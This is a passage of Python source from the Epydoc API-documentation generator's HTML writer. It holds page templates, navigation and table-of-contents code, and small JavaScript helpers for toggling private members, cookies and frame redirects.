except: raise IOError("Can't open help file: %r" % self._helpfile) else: raise IOError("Can't find help file: %r" % self._helpfile) else: if self._prj_name: thisprj = self._prj_name else: thisprj = 'this project' help = HTML_HELP % {'this_project':thisprj} # Insert the help contents into a webpage. self.write_header(out, 'Help') self.write_navbar(out, 'help') self.write_breadcrumbs(out, 'help', 'help.html') out(help) self.write_navbar(out, 'help') self.write_footer(out) #//////////////////////////////////////////////////////////// #{ 2.6. Frames-based Table of Contents #//////////////////////////////////////////////////////////// write_frames_index = compile_template( """ write_frames_index(self, out) Write the frames index file for the frames-based table of contents to the given streams. """, # /------------------------- Template -------------------------\ ''' <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "DTD/xhtml1-frameset.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> $self._prj_name or "API Documentation"$ </title> </head> <frameset cols="20%,80%"> <frameset rows="30%,70%"> <frame src="toc.html" name="moduleListFrame" id="moduleListFrame" /> <frame src="toc-everything.html" name="moduleFrame" id="moduleFrame" /> </frameset> <frame src="$self._top_page_url$" name="mainFrame" id="mainFrame" /> </frameset> </html> ''') # \------------------------------------------------------------/ write_toc = compile_template( """ write_toc(self, out) """, # /------------------------- Template -------------------------\ ''' >>> self.write_header(out, "Table of Contents") <h1 class="toc">Table&nbsp;of&nbsp;Contents</h1> <hr /> <a target="moduleFrame" href="toc-everything.html">Everything</a> <br /> >>> self.write_toc_section(out, "Modules", self.module_list) <hr /> >>> if self._show_private: $self.PRIVATE_LINK$ >>> #endif >>> self.write_footer(out, short=True) ''') # \------------------------------------------------------------/ def write_toc_section(self, out, name, docs, fullname=True): if not docs: return # Assign names to each item, and sort by name. if fullname: docs = [(str(d.canonical_name), d) for d in docs] else: docs = [(str(d.canonical_name[-1]), d) for d in docs] docs.sort() out(' <h2 class="toc">%s</h2>\n' % name) for label, doc in docs: doc_url = self.url(doc) toc_url = 'toc-%s' % doc_url is_private = self._doc_or_ancestor_is_private(doc) if is_private: if not self._show_private: continue out(' <div class="private">\n') if isinstance(doc, ModuleDoc): out(' <a target="moduleFrame" href="%s"\n' ' onclick="setFrame(\'%s\',\'%s\');"' ' >%s</a><br />' % (toc_url, toc_url, doc_url, label)) else: out(' <a target="mainFrame" href="%s"\n' ' >%s</a><br />' % (doc_url, label)) if is_private: out(' </div>\n') def write_project_toc(self, out): self.write_header(out, "Everything") out('<h1 class="toc">Everything</h1>\n') out('<hr />\n') # List the classes. self.write_toc_section(out, "All Classes", self.class_list) # List the functions. funcs = [d for d in self.routine_list if not isinstance(self.docindex.container(d), (ClassDoc, types.NoneType))] self.write_toc_section(out, "All Functions", funcs) # List the variables. vars = [] for doc in self.module_list: vars += doc.select_variables(value_type='other', imported=False, public=self._public_filter) self.write_toc_section(out, "All Variables", vars) # Footer material. out('<hr />\n') if self._show_private: out(self.PRIVATE_LINK+'\n') self.write_footer(out, short=True) def write_module_toc(self, out, doc): """ Write an HTML page containing the table of contents page for the given module to the given streams. This page lists the modules, classes, exceptions, functions, and variables defined by the module. """ name = doc.canonical_name[-1] self.write_header(out, name) out('<h1 class="toc">Module %s</h1>\n' % name) out('<hr />\n') # List the classes. classes = doc.select_variables(value_type='class', imported=False, public=self._public_filter) self.write_toc_section(out, "Classes", classes, fullname=False) # List the functions. funcs = doc.select_variables(value_type='function', imported=False, public=self._public_filter) self.write_toc_section(out, "Functions", funcs, fullname=False) # List the variables. variables = doc.select_variables(value_type='other', imported=False, public=self._public_filter) self.write_toc_section(out, "Variables", variables, fullname=False) # Footer material. out('<hr />\n') if self._show_private: out(self.PRIVATE_LINK+'\n') self.write_footer(out, short=True) #//////////////////////////////////////////////////////////// #{ 2.7. Project homepage (index.html) #//////////////////////////////////////////////////////////// def write_homepage(self, directory): """ Write an C{index.html} file in the given directory. The contents of this file are copied or linked from an existing page, so this method must be called after all pages have been written. The page used is determined by L{_frames_index} and L{_top_page}: - If L{_frames_index} is true, then C{frames.html} is copied. - Otherwise, the page specified by L{_top_page} is copied. """ filename = os.path.join(directory, 'index.html') if self._frames_index: top = 'frames.html' else: top = self._top_page_url # Copy the non-frames index file from top, if it's internal. if top[:5] != 'http:' and '/' not in top: try: # Read top into `s`. topfile = os.path.join(directory, top) s = open(topfile, 'r').read() # Write the output file. open(filename, 'w').write(s) return except: log.error('Warning: error copying index; ' 'using a redirect page') # Use a redirect if top is external, or if we faild to copy. name = self._prj_name or 'this project' f = open(filename, 'w') self.write_redirect_index(f.write, top, name) f.close() write_redirect_index = compile_template( """ write_redirect_index(self, out, top, name) """, # /------------------------- Template -------------------------\ ''' <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Redirect </title> <meta http-equiv="refresh" content="1;url=$top$" /> <link rel="stylesheet" href="epydoc.css" type="text/css"></link> </head> <body> <p>Redirecting to the API documentation for <a href="$top$">$self._prj_name or "this project"$</a>...</p> </body> </html> ''') # \------------------------------------------------------------/ #//////////////////////////////////////////////////////////// #{ 2.8. Stylesheet (epydoc.css) #//////////////////////////////////////////////////////////// def write_css(self, directory, cssname): """ Write the CSS stylesheet in the given directory. If C{cssname} contains a stylesheet file or name (from L{epydoc.docwriter.html_css}), then use that stylesheet; otherwise, use the default stylesheet. @rtype: C{None} """ filename = os.path.join(directory, 'epydoc.css') # Get the contents for the stylesheet file. if cssname is None: css = STYLESHEETS['default'][0] else: if os.path.exists(cssname): try: css = open(cssname).read() except: raise IOError("Can't open CSS file: %r" % cssname) elif cssname in STYLESHEETS: css = STYLESHEETS[cssname][0] else: raise IOError("Can't find CSS file: %r" % cssname) # Write the stylesheet. cssfile = open(filename, 'w') cssfile.write(css) cssfile.close() #//////////////////////////////////////////////////////////// #{ 2.9. Javascript (epydoc.js) #//////////////////////////////////////////////////////////// def write_javascript(self, directory): jsfile = open(os.path.join(directory, 'epydoc.js'), 'w') print >> jsfile, self.TOGGLE_PRIVATE_JS print >> jsfile, self.SHOW_PRIVATE_JS print >> jsfile, self.GET_COOKIE_JS print >> jsfile, self.SET_FRAME_JS print >> jsfile, self.HIDE_PRIVATE_JS print >> jsfile, self.TOGGLE_CALLGRAPH_JS print >> jsfile, html_colorize.PYSRC_JAVASCRIPTS print >> jsfile, self.GET_ANCHOR_JS print >> jsfile, self.REDIRECT_URL_JS jsfile.close() #: A javascript that is used to show or hide the API documentation #: for private objects. In order for this to work correctly, all #: documentation for private objects should be enclosed in #: C{<div class="private">...</div>} elements. TOGGLE_PRIVATE_JS = ''' function toggle_private() { // Search for any private/public links on this page. Store // their old text in "cmd," so we will know what action to // take; and change their text to the opposite action. var cmd = "?"; var elts = document.getElementsByTagName("a"); for(var i=0; i<elts.length; i++) { if (elts[i].className == "privatelink") { cmd = elts[i].innerHTML; elts[i].innerHTML = ((cmd && cmd.substr(0,4)=="show")? "hide&nbsp;private":"show&nbsp;private"); } } // Update all DIVs containing private objects. var elts = document.getElementsByTagName("div"); for(var i=0; i<elts.length; i++) { if (elts[i].className == "private") { elts[i].style.display = ((cmd && cmd.substr(0,4)=="hide")?"none":"block"); } else if (elts[i].className == "public") { elts[i].style.display = ((cmd && cmd.substr(0,4)=="hide")?"block":"none"); } } // Update all table rows containing private objects. Note, we // use "" instead of "block" becaue IE & firefox disagree on what // this should be (block vs table-row), and "" just gives the // default for both browsers. var elts = document.getElementsByTagName("tr"); for(var i=0; i<elts.length; i++) { if (elts[i].className == "private") { elts[i].style.display = ((cmd && cmd.substr(0,4)=="hide")?"none":""); } } // Update all list items containing private objects. var elts = document.getElementsByTagName("li"); for(var i=0; i<elts.length; i++) { if (elts[i].className == "private") { elts[i].style.display = ((cmd && cmd.substr(0,4)=="hide")? "none":""); } } // Update all list items containing private objects. var elts = document.getElementsByTagName("ul"); for(var i=0; i<elts.length; i++) { if (elts[i].className == "private") { elts[i].style.display = ((cmd && cmd.substr(0,4)=="hide")?"none":"block"); } } // Set a cookie to remember the current option. document.cookie = "EpydocPrivate="+cmd; } '''.strip() #: A javascript that is used to read the value of a cookie. This #: is used to remember whether private variables should be shown or #: hidden. GET_COOKIE_JS = ''' function getCookie(name) { var dc = document.cookie; var prefix = name + "="; var begin = dc.indexOf("; " + prefix); if (begin == -1) { begin = dc.indexOf(prefix); if (begin != 0) return null; } else { begin += 2; } var end = document.cookie.indexOf(";", begin); if (end == -1) { end = dc.length; } return unescape(dc.substring(begin + prefix.length, end)); } '''.strip() #: A javascript that is used to set the contents of two frames at #: once. This is used by the project table-of-contents frame to #: set both the module table-of-contents frame and the main frame #: when the user clicks on a module. SET_FRAME_JS = ''' function setFrame(url1, url2) { parent.frames[1].location.href = url1; parent.frames[2].location.href = url2; } '''.strip() #: A javascript that is used to hide private variables, unless #: either: (a) the cookie says not to; or (b) we appear to be #: linking to a private variable. HIDE_PRIVATE_JS = ''' function checkCookie() { var cmd=getCookie("EpydocPrivate"); if (cmd && cmd.substr(0,4)!="show" && location.href.indexOf("#_") < 0) toggle_private(); } '''.strip() TOGGLE_CALLGRAPH_JS = ''' function toggleCallGraph(id) { var elt = document.getElementById(id); if (elt.style.display == "none") elt.style.display = "block"; else elt.style.display = "none"; } '''.strip() SHOW_PRIVATE_JS = ''' function show_private() { var elts = document.getElementsByTagName("a"); for(var i=0; i<elts.length; i++) { if (elts[i].className == "privatelink") { cmd = elts[i].innerHTML; if (cmd && cmd.substr(0,4)=="show") toggle_private(); } } } '''.strip() GET_ANCHOR_JS = ''' function get_anchor() { var href = location.href; var start = href.indexOf("#")+1; if ((start != 0) && (start != href.length)) return href.substring(start, href.length); } '''.strip() #: A javascript that is used to implement the auto-redirect page. #: When the user visits <redirect.html#dotted.name>, they will #: automatically get redirected to the page for the object with #: the given fully-qualified dotted name. E.g., for epydoc, #: <redirect.html#epydoc.apidoc.UNKNOWN> redirects the user to #: <epydoc.apidoc-module.html#UNKNOWN>. REDIRECT_URL_JS = ''' function redirect_url(dottedName) { // Scan through each element of the "pages" list, and check // if "name" matches with any of them. for (var i=0; i<pages.length; i++) { // Each page has the form "<pagename>-m" or "<pagename>-c"; // extract the <pagename> portion & compare it to dottedName. var pagename = pages[i].substring(0, pages[i].length-2); if (pagename == dottedName.substring(0,pagename.length)) { // We\'ve found a page that matches `dottedName`; // construct its URL, using leftover `dottedName` // content to form an anchor. var pagetype = pages[i].charAt(pages[i].length-1); var url = pagename + ((pagetype=="m")?"-module.html": "-class.html"); if (dottedName.length > pagename.length) url += "#" + dottedName.substring(pagename.length+1, dottedName.length); return url; } } } '''.strip() #//////////////////////////////////////////////////////////// #{ 2.10. Graphs #//////////////////////////////////////////////////////////// def render_graph(self, graph): if graph is None: return '' graph.caption = graph.title = None image_url = '%s.gif' % graph.uid image_file = os.path.join(self._directory, image_url) return graph.to_html(image_file, image_url) RE_CALLGRAPH_ID = re.compile(r"""["'](.+-div)['"]""") def render_callgraph(self, callgraph, token=""): """Render the HTML chunk of a callgraph. If C{callgraph} is a string, use the L{_callgraph_cache} to return a pre-rendered HTML chunk. This mostly avoids to run C{dot} twice for the same callgraph. Else, run the graph and store its HTML output in the cache. @param callgraph: The graph to render or its L{uid<DotGraph.uid>}. @type callgraph: L{DotGraph} or C{str} @param token: A string that can be used to make the C{<div>} id unambiguous, if the callgraph is used more than once in a page. @type token: C{str} @return: The HTML representation of the graph. @rtype: C{str} """ if callgraph is None: return "" if isinstance(callgraph, basestring): uid = callgraph rv = self._callgraph_cache.get(callgraph, "") else: uid = callgraph.uid graph_html = self.render_graph(callgraph) if graph_html == '': rv = "" else: rv = ('<div style="display:none" id="%%s-div"><center>\n' '<table border="0" cellpadding="0" cellspacing="0">\n' ' <tr><td>%s</td></tr>\n' ' <tr><th>Call Graph</th></tr>\n' '</table><br />\n</center></div>\n' % graph_html) # Store in the cache the complete HTML chunk without the # div id, which may be made unambiguous by the token self._callgraph_cache[uid] = rv # Mangle with the graph if rv: rv = rv % (uid + token) return rv def callgraph_link(self, callgraph, token=""): """Render the HTML chunk of a callgraph link. The link can toggles the visibility of the callgraph rendered using L{render_callgraph} with matching parameters. @param callgraph: The graph to render or its L{uid<DotGraph.uid>}. @type callgraph: L{DotGraph} or C{str} @param token: A string that can be used to make the C{<div>} id unambiguous, if the callgraph is used more than once in a page. @type token: C{str} @return: The HTML representation of the graph link. @rtype: C{str} """ # Use class=codelink, to match style w/ the source code link. if callgraph is None: return '' if isinstance(callgraph, basestring): uid = callgraph else: uid = callgraph.uid return ('<br /><span class="codelink"><a href="javascript:void(0);" ' 'onclick="toggleCallGraph(\'%s-div\');return false;">' 'call&nbsp;graph</a></span>&nbsp;' % (uid + token)) #//////////////////////////////////////////////////////////// #{ 2.11. Images #//////////////////////////////////////////////////////////// IMAGES = {'crarr.png': # Carriage-return arrow, used for LINEWRAP. 'iVBORw0KGgoAAAANSUhEUgAAABEAAAAKCAMAAABlokWQAAAALHRFWHRD' 'cmVhdGlvbiBUaW1lAFR1\nZSAyMiBBdWcgMjAwNiAwMDo0MzoxMCAtMD' 'UwMGAMEFgAAAAHdElNRQfWCBYFASkQ033WAAAACXBI\nWXMAAB7CAAAe' 'wgFu0HU+AAAABGdBTUEAALGPC/xhBQAAAEVQTFRF////zcOw18/AgGY0' 'c1cg4dvQ\ninJEYEAAYkME3NXI6eTcloFYe2Asr5+AbE4Uh29A9fPwqp' 'l4ZEUI8O3onopk0Ma0lH5U1nfFdgAA\nAAF0Uk5TAEDm2GYAAABNSURB' 'VHjaY2BAAbzsvDAmK5oIlxgfioiwCAe7KJKIgKAQOzsLLwTwA0VY\n+d' 'iRAT8T0AxuIIMHqoaXCWIPGzsHJ6orGJiYWRjQASOcBQAocgMSPKMTIg' 'AAAABJRU5ErkJggg==\n', } def write_images(self, directory): for (name, data) in self.IMAGES.items(): f = open(os.path.join(directory, name), 'wb') f.write(base64.decodestring(data)) f.close() #//////////////////////////////////////////////////////////// #{ 3.1. Page Header #//////////////////////////////////////////////////////////// write_header = compile_template( """ write_header(self, out, title) Generate HTML code for the standard page header, and write it to C{out}. C{title} is a string containing the page title. It should be appropriately escaped/encoded. """, # /------------------------- Template -------------------------\ ''' <?xml version="1.0" encoding="ascii"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>$title$</title> <link rel="stylesheet" href="epydoc.css" type="text/css" /> <script type="text/javascript" src="epydoc.js"></script> </head> <body bgcolor="white" text="black" link="blue" vlink="#204080" alink="#204080"> ''') # \------------------------------------------------------------/ #//////////////////////////////////////////////////////////// #{ 3.2. Page Footer #//////////////////////////////////////////////////////////// write_footer = compile_template( """ write_footer(self, out, short=False) Generate HTML code for the standard page footer, and write it to C{out}. """, # /------------------------- Template -------------------------\ ''' >>> if not short: <table border="0" cellpadding="0" cellspacing="0" width="100%%"> <tr> <td align="left" class="footer"> >>> if self._include_log: <a href="epydoc-log.html">Generated by Epydoc $epydoc.__version__$ on $time.asctime()$</a> >>> else: Generated by Epydoc $epydoc.__version__$ on $time.asctime()$ >>> #endif </td> <td align="right" class="footer"> <a target="mainFrame" href="http://epydoc.sourceforge.net" >http://epydoc.sourceforge.net</a> </td> </tr> </table> >>> #endif <script type="text/javascript"> <!-- // Private objects are initially displayed (because if // javascript is turned off then we want them to be // visible); but by default, we want to hide them. So hide // them unless we have a cookie that says to show them. checkCookie(); // --> </script> </body> </html> ''') # \------------------------------------------------------------/ #//////////////////////////////////////////////////////////// #{ 3.3. Navigation Bar #//////////////////////////////////////////////////////////// write_navbar = compile_template( """ write_navbar(self, out, context) Generate HTML code for the navigation bar, and write it to C{out}. The navigation bar typically looks like:: [ Home Trees Index Help Project ] @param context: A value indicating what page we're generating a navigation bar for. If we're generating an API documentation page for an object, then C{context} is a L{ValueDoc} containing the documentation for that object; otherwise, C{context} is a string name for the page. The following string names are recognized: C{'tree'}, C{'index'}, and C{'help'}. """, # /------------------------- Template -------------------------\ ''' <!-- ==================== NAVIGATION BAR ==================== --> <table class="navbar" border="0" width="100%" cellpadding="0" bgcolor="#a0c0ff" cellspacing="0"> <tr valign="middle"> >>> if self._top_page_url not in (self._trees_url, "identifier-index.html", "help.html"): <!-- Home link --> >>> if (isinstance(context, ValueDoc) and >>> self._top_page_url == self.url(context.canonical_name)): <th bgcolor="#70b0f0" class="navbar-select" >&nbsp;&nbsp;&nbsp;Home&nbsp;&nbsp;&nbsp;</th> >>> else: <th>&nbsp;&nbsp;&nbsp;<a href="$self._top_page_url$">Home</a>&nbsp;&nbsp;&nbsp;</th> >>> #endif <!-- Tree link --> >>> if context == "trees": <th bgcolor="#70b0f0" class="navbar-select" >&nbsp;&nbsp;&nbsp;Trees&nbsp;&nbsp;&nbsp;</th> >>> else: <th>&nbsp;&nbsp;&nbsp;<a href="$self._trees_url$">Trees</a>&nbsp;&nbsp;&nbsp;</th> >>> #endif <!-- Index link --> >>> if context == "indices": <th bgcolor="#70b0f0" class="navbar-select" >&nbsp;&nbsp;&nbsp;Indices&nbsp;&nbsp;&nbsp;</th> >>> else: <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th> >>> #endif <!-- Help link --> >>> if context == "help": <th bgcolor="#70b0f0" class="navbar-select" >&nbsp;&nbsp;&nbsp;Help&nbsp;&nbsp;&nbsp;</th> >>> else: <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th> >>> #endif >>> if self._prj_link: <!-- Project homepage --> <th class="navbar" align="right" width="100%"> <table border="0" cellpadding="0" cellspacing="0"> <tr><th class="navbar" align="center" >$self._prj_link.strip()$</th> </tr></table></th> >>> else: <th class="navbar" width="100%"></th> >>> #endif </tr> </table> ''') # \------------------------------------------------------------/ #//////////////////////////////////////////////////////////// #{ 3.4. Breadcrumbs #//////////////////////////////////////////////////////////// write_breadcrumbs = compile_template( """ write_breadcrumbs(self, out, context, context_url) Generate HTML for the breadcrumbs line, and write it to C{out}. The breadcrumbs line is an invisible table with a list of pointers to the current object's ancestors on the left; and the show/hide private selector and the frames/noframes selector on the right. @param context: The API documentation for the object whose breadcrumbs we should generate. @type context: L{ValueDoc} """, # /------------------------- Template -------------------------\ ''' <table width="100%" cellpadding="0" cellspacing="0"> <tr valign="top"> >>> if isinstance(context, APIDoc): <td width="100%"> <span class="breadcrumbs"> >>> crumbs = self.breadcrumbs(context) >>> for crumb in crumbs[:-1]: $crumb$ :: >>> #endfor $crumbs[-1]$ </span> </td> >>> else: <td width="100%">&nbsp;</td> >>> #endif <td> <table cellpadding="0" cellspacing="0"> <!-- hide/show private --> >>> if self._show_private: <tr><td align="right">$self.PRIVATE_LINK$</td></tr> >>> #endif >>> if self._frames_index: <tr><td align="right"><span class="options" >[<a href="frames.html" target="_top">frames</a >]&nbsp;|&nbsp;<a href="$context_url$" target="_top">no&nbsp;frames</a>]</span></td></tr> >>> #endif </table> </td> </tr> </table> ''') # \------------------------------------------------------------/ def breadcrumbs(self, doc): crumbs = [self._crumb(doc)] # Generate the crumbs for uid's ancestors. while True: container = self.docindex.container(doc) assert doc != container, 'object is its own container?' if container is None: if doc.canonical_name is UNKNOWN: return ['??']+crumbs elif isinstance(doc, ModuleDoc): return ['Package&nbsp;%s' % ident for ident in doc.canonical_name[:-1]]+crumbs else: return list(doc.canonical_name)+crumbs else: label = self._crumb(container) name = container.canonical_name crumbs.insert(0, self.href(container, label)) # [xx] code=0?? doc = container def _crumb(self, doc): if (len(doc.canonical_name)==1 and doc.canonical_name[0].startswith('script-')): return 'Script&nbsp;%s' % doc.canonical_name[0][7:] return '%s&nbsp;%s' % (self.doc_kind(doc), doc.canonical_name[-1]) #//////////////////////////////////////////////////////////// #{ 3.5. Summary Tables #//////////////////////////////////////////////////////////// def write_summary_table(self, out, heading, doc, value_type): """ Generate HTML code for a summary table, and write it to C{out}. A summary table is a table that includes a one-row description for each variable (of a given type) in a module or class. @param heading: The heading for the summary table; typically, this indicates what kind of value the table describes (e.g., functions or classes). @param doc: A L{ValueDoc} object containing the API documentation for the module or class whose variables we should summarize. @param value_type: A string indicating what type of value should be listed in this summary table. This value is passed on to C{doc}'s C{select_variables()} method. """ # inh_var_groups is a dictionary used to hold "inheritance # pseudo-groups", which are created when inheritance is # 'grouped'. It maps each base to a list of vars inherited # from that base. grouped_inh_vars = {} # Divide all public variables of the given type into groups. groups = [(plaintext_to_html(group_name), doc.select_variables(group=group_name, imported=False, value_type=value_type, public=self._public_filter)) for group_name in doc.group_names()] # Discard any empty groups; and return if they're all empty. groups = [(g,vars) for (g,vars) in groups if vars] if not groups: return # Write a header self.write_table_header(out, "summary", heading) # Write a section for each group. for name, var_docs in groups: self.write_summary_group(out, doc, name, var_docs, grouped_inh_vars) # Write a section for each inheritance pseudo-group (used if # inheritance=='grouped') if grouped_inh_vars: for base in doc.mro(): if base in grouped_inh_vars: hdr = 'Inherited from %s' % self.href(base, context=doc) tr_class = '' if len([v for v in grouped_inh_vars[base] if v.is_public]) == 0: tr_class = ' class="private"' self.write_group_header(out, hdr, tr_class) for var_doc in grouped_inh_vars[base]: self.write_summary_line(out, var_doc, doc) # Write a footer for the table. out(self.TABLE_FOOTER) def write_summary_group(self, out, doc, name, var_docs, grouped_inh_vars): # Split up the var_docs list, according to the way each var # should be displayed: # - listed_inh_vars -- for listed inherited variables. # - grouped_inh_vars -- for grouped inherited variables. # - normal_vars -- for all other variables. listed_inh_vars = {} normal_vars = [] for var_doc in var_docs: if var_doc.container != doc: base = var_doc.container if not isinstance(base, ClassDoc): # This *should* never happen: log.warning("%s's container is not a class!" % var_doc) normal_vars.append(var_doc) elif (base not in self.class_set or self._inheritance == 'listed'): listed_inh_vars.setdefault(base,[]).append(var_doc) elif self._inheritance == 'grouped': grouped_inh_vars.setdefault(base,[]).append(var_doc) else: normal_vars.append(var_doc) else: normal_vars.append(var_doc) # Write a header for the group. if name != '': tr_class = '' if len([v for v in var_docs if v.is_public]) == 0: tr_class = ' class="private"' self.write_group_header(out, name, tr_class) # Write a line for each normal var: for var_doc in normal_vars: self.write_summary_line(out, var_doc, doc) # Write a subsection for inherited vars: if listed_inh_vars: self.write_inheritance_list(out, doc, listed_inh_vars) def write_inheritance_list(self, out, doc, listed_inh_vars): out(' <tr>\n <td colspan="2" class="summary">\n') for base in doc.mro(): if base not in listed_inh_vars: continue public_vars = [v for v in listed_inh_vars[base] if v.is_public] private_vars = [v for v in listed_inh_vars[base] if not v.is_public] if public_vars: out(' <p class="indent-wrapped-lines">' '<b>Inherited from <code>%s</code></b>:\n' % self.href(base, context=doc)) self.write_var_list(out, public_vars) out(' </p>\n') if private_vars and self._show_private: out(' <div class="private">') out(' <p class="indent-wrapped-lines">' '<b>Inherited from <code>%s</code></b> (private):\n' % self.href(base, context=doc)) self.write_var_list(out, private_vars) out(' </p></div>\n') out(' </td>\n </tr>\n') def write_var_list(self, out, vardocs): out(' ') out(',\n '.join(['<code>%s</code>' % self.href(v,v.name) for v in vardocs])+'\n') def write_summary_line(self, out, var_doc, container): """ Generate HTML code for a single line of a summary table, and write it to C{out}. See L{write_summary_table} for more information. @param var_doc: The API documentation for the variable that should be described by this line of the summary table. @param container: The API documentation for the class or module whose summary table we're writing. """ pysrc_link = None callgraph = None # If it's a private variable, then mark its <tr>. if var_doc.is_public: tr_class = '' else: tr_class = ' class="private"' # Decide an anchor or a link is to be generated. link_name = self._redundant_details or var_doc.is_detailed() anchor = not link_name # Construct the HTML code for the type (cell 1) & description # (cell 2). if isinstance(var_doc.value, RoutineDoc): typ = self.return_type(var_doc, indent=6) description = self.function_signature(var_doc, is_summary=True, link_name=link_name, anchor=anchor) pysrc_link = self.pysrc_link(var_doc.value) # Perpare the call-graph, if requested if 'callgraph' in self._graph_types: linker = _HTMLDocstringLinker(self, var_doc.value) callgraph = call_graph([var_doc.value], self.docindex, linker, var_doc, add_callers=True, add_callees=True) if callgraph and callgraph.nodes: var_doc.value.callgraph_uid = callgraph.uid else: callgraph = None else: typ = self.type_descr(var_doc, indent=6) description = self.summary_name(var_doc, link_name=link_name, anchor=anchor) if isinstance(var_doc.value, GenericValueDoc): # The summary max length has been chosen setting # L{ValueDoc.SUMMARY_REPR_LINELEN} in the constructor max_len=self._variable_summary_linelen-3-len(var_doc.name) val_repr = var_doc.value.summary_pyval_repr(max_len) tooltip = self.variable_tooltip(var_doc) description += (' = <code%s>%s</code>' % (tooltip, val_repr.to_html(None))) # Add the summary to the description (if there is one). summary = self.summary(var_doc, indent=6) if summary: description += '<br />\n %s' % summary # If it's inherited, then add a note to the description. if var_doc.container != container and self._inheritance=="included": description += ("\n <em>(Inherited from " + self.href(var_doc.container) + ")</em>") # Write the summary line. self._write_summary_line(out, typ, description, tr_class, pysrc_link, callgraph) _write_summary_line = compile_template( "_write_summary_line(self, out, typ, description, tr_class, " "pysrc_link, callgraph)", # /------------------------- Template -------------------------\ ''' <tr$tr_class$> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">$typ or "&nbsp;"$</span> </td><td class="summary"> >>> if pysrc_link is not None or callgraph is not None: <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td>$description$</td> <td align="right" valign="top"> $pysrc_link$ $self.callgraph_link(callgraph, token='-summary')$ </td> </tr> </table> $self.render_callgraph(callgraph, token='-summary')$ >>> #endif >>> if pysrc_link is None and callgraph is None: $description$ >>> #endif </td> </tr> ''') # \------------------------------------------------------------/ #//////////////////////////////////////////////////////////// #{ 3.6. Details Lists #//////////////////////////////////////////////////////////// def write_details_list(self, out, heading, doc, value_type): # Get a list of the VarDocs we should describe. if self._redundant_details: detailed = None else: detailed = True if isinstance(doc, ClassDoc): var_docs = doc.select_variables(value_type=value_type, imported=False, inherited=False, public=self._public_filter, detailed=detailed) else: var_docs = doc.select_variables(value_type=value_type, imported=False, public=self._public_filter, detailed=detailed) if not var_docs: return # Write a header self.write_table_header(out, "details", heading) out(self.TABLE_FOOTER) for var_doc in var_docs: self.write_details_entry(out, var_doc) out('<br />\n') def write_details_entry(self, out, var_doc): descr = self.descr(var_doc, indent=2) or '' if var_doc.is_public: div_class = '' else: div_class = ' class="private"' # Functions if isinstance(var_doc.value, RoutineDoc): rtype = self.return_type(var_doc, indent=10) rdescr = self.return_descr(var_doc, indent=10) arg_descrs = [] args = set() # Find the description for each arg. (Leave them in the # same order that they're listed in the docstring.) for (arg_names, arg_descr) in var_doc.value.arg_descrs: args.update(arg_names) lhs = ', '.join([self.arg_name_to_html(var_doc.value, n) for n in arg_names]) rhs = self.docstring_to_html(arg_descr, var_doc.value, 10) arg_descrs.append( (lhs, rhs) ) # Check for arguments for which we have @type but not @param; # and add them to the arg_descrs list. for arg in var_doc.value.arg_types: if arg not in args: argname = self.arg_name_to_html(var_doc.value, arg) arg_descrs.append( (argname,'') ) self.write_function_details_entry(out, var_doc, descr, var_doc.value.callgraph_uid, rtype, rdescr, arg_descrs, div_class) # Properties elif isinstance(var_doc.value, PropertyDoc): prop_doc = var_doc.value accessors = [ (name, self.property_accessor_to_html(val_doc, prop_doc), self.summary(val_doc)) for (name, val_doc) in [('Get', prop_doc.fget), ('Set', prop_doc.fset), ('Delete', prop_doc.fdel)] if val_doc not in (None, UNKNOWN) and val_doc.pyval is not None ] self.write_property_details_entry(out, var_doc, descr, accessors, div_class) # Variables else: self.write_variable_details_entry(out, var_doc, descr, div_class) def labelled_list_item(self, lhs, rhs): # If the RHS starts with a paragraph, then move the # paragraph-start tag to the beginning of the lhs instead (so # there won't be a line break after the '-'). m = re.match(r'^<p( [^>]+)?>', rhs) if m: lhs = m.group() + lhs rhs = rhs[m.end():] if rhs: return '<li>%s - %s</li>' % (lhs, rhs) else: return '<li>%s</li>' % (lhs,) def property_accessor_to_html(self, val_doc, context=None): if val_doc not in (None, UNKNOWN): if isinstance(val_doc, RoutineDoc): return self.function_signature(val_doc, is_summary=True, link_name=True, context=context) elif isinstance(val_doc, GenericValueDoc): return self.pprint_value(val_doc) else: return self.href(val_doc, context=context) else: return '??' def arg_name_to_html(self, func_doc, arg_name): """ A helper function used to format an argument name, for use in the argument description list under a routine's details entry. This just wraps strong & code tags around the arg name; and if the arg name is associated with a type, then adds it parenthetically after the name. """ s = '<strong class="pname"><code>%s</code></strong>' % arg_name if arg_name in func_doc.arg_types: typ = func_doc.arg_types[arg_name] typ_html = self.docstring_to_html(typ, func_doc, 10) s += " (%s)" % typ_html return s write_function_details_entry = compile_template( ''' write_function_details_entry(self, out, var_doc, descr, callgraph, \ rtype, rdescr, arg_descrs, div_class) ''', # /------------------------- Template -------------------------\ ''' >>> func_doc = var_doc.value <a name="$var_doc.name$"></a> <div$div_class$> >>> self.write_table_header(out, "details") <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc">$self.function_signature(var_doc)$ >>> if var_doc.name in self.SPECIAL_METHODS: <br /><em class="fname">($self.SPECIAL_METHODS[var_doc.name]$)</em> >>> #endif >>> if isinstance(func_doc, ClassMethodDoc): <br /><em class="fname">Class Method</em> >>> #endif >>> if isinstance(func_doc, StaticMethodDoc): <br /><em class="fname">Static Method</em> >>> #endif </h3> </td><td align="right" valign="top" >$self.pysrc_link(func_doc)$&nbsp; $self.callgraph_link(callgraph)$</td> </tr></table> $self.render_callgraph(callgraph)$ $descr$ <dl class="fields"> >>> # === parameters === >>> if arg_descrs: <dt>Parameters:</dt> <dd><ul 